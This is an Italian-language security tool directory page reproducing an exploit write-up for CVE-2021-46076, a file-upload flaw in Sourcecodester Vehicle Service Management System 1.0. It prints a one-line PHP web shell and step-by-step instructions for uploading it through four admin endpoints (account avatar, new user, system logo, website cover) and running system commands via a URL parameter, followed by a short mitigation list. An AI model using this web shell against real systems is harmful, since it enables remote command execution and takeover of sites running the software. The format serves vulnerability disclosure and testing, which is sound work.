Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 è vulnerabile al caricamento di file. Un attaccante può caricare un file php dannoso in più endpoint, portando a Esecuzione di codice. | Kitploit
Strumenti/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 è vulnerabile al caricamento di file. Un attaccante può caricare un file php dannoso in più endpoint, portando a Esecuzione di codice.

Vedi Repository
3 mesi faNon ancora revisionato

CVE-2021-46076

Titolo dell'exploit: Vehicle Service Management System - 'Multiple' File upload Leads to Code Execution

Autore dell'exploit: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 HIGH

Riferimenti:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Descrizione:

Sourcecodester Vehicle Service Management System 1.0 è vulnerabile al caricamento di file. Un attaccante può caricare un file php dannoso in molteplici endpoint, portando all'esecuzione di codice.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione My Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php precedente, ad esempio: Cmd.php
  2. Nella sezione My Account inserisci tutti i dettagli richiesti e seleziona il file php in Avatar.
  3. Fai clic sul pulsante Update.
  4. Apri l'immagine dell'avatar in una nuova scheda.
  5. Aggiungi il parametro cmd nell'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione User List e fai clic sul pulsante Create New.

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php precedente, ad esempio: Cmd.php
  2. Nella pagina Create New User inserisci tutti i dettagli richiesti e seleziona il file php in Avatar.
  3. Fai clic sul pulsante Save.
  4. Apri l'immagine dell'avatar in una nuova scheda.
  5. Aggiungi il parametro cmd nell'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php precedente, ad esempio: Cmd.php
  2. Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file php in System Logo.
  3. Fai clic sul pulsante Update.
  4. Apri l'immagine del System Logo in una nuova scheda.
  5. Aggiungi il parametro cmd nell'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Vai alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Salva il codice php precedente, ad esempio: Cmd.php
  2. Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file php in Website Cover.
  3. Fai clic sul pulsante Update.
  4. Apri l'immagine del Website Cover in una nuova scheda.
  5. Aggiungi il parametro cmd nell'URL ed esegui i comandi.
  6. URL finale: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Esegui tutti i comandi di sistema, ad esempio: id, whoami, pwd, ecc.

Impatto:

Un attaccante può caricare un file php dannoso in molteplici endpoint, portando all'esecuzione di codice.

Mitigazione:

Si consiglia di implementare quanto segue:

  • Non accettare mai un nome file e la sua estensione direttamente senza un filtro basato su whitelist.
  • Se non c'è necessità di caratteri Unicode, è altamente consigliato accettare solo caratteri alfanumerici e un solo punto come input per il nome del file e l'estensione.
  • Limitare la dimensione del file a un valore massimo per prevenire attacchi di denial of service.
  • La directory di upload non deve avere alcun permesso di "esecuzione".
  • Non affidarsi solo alla validazione lato client.
Scarica lo strumento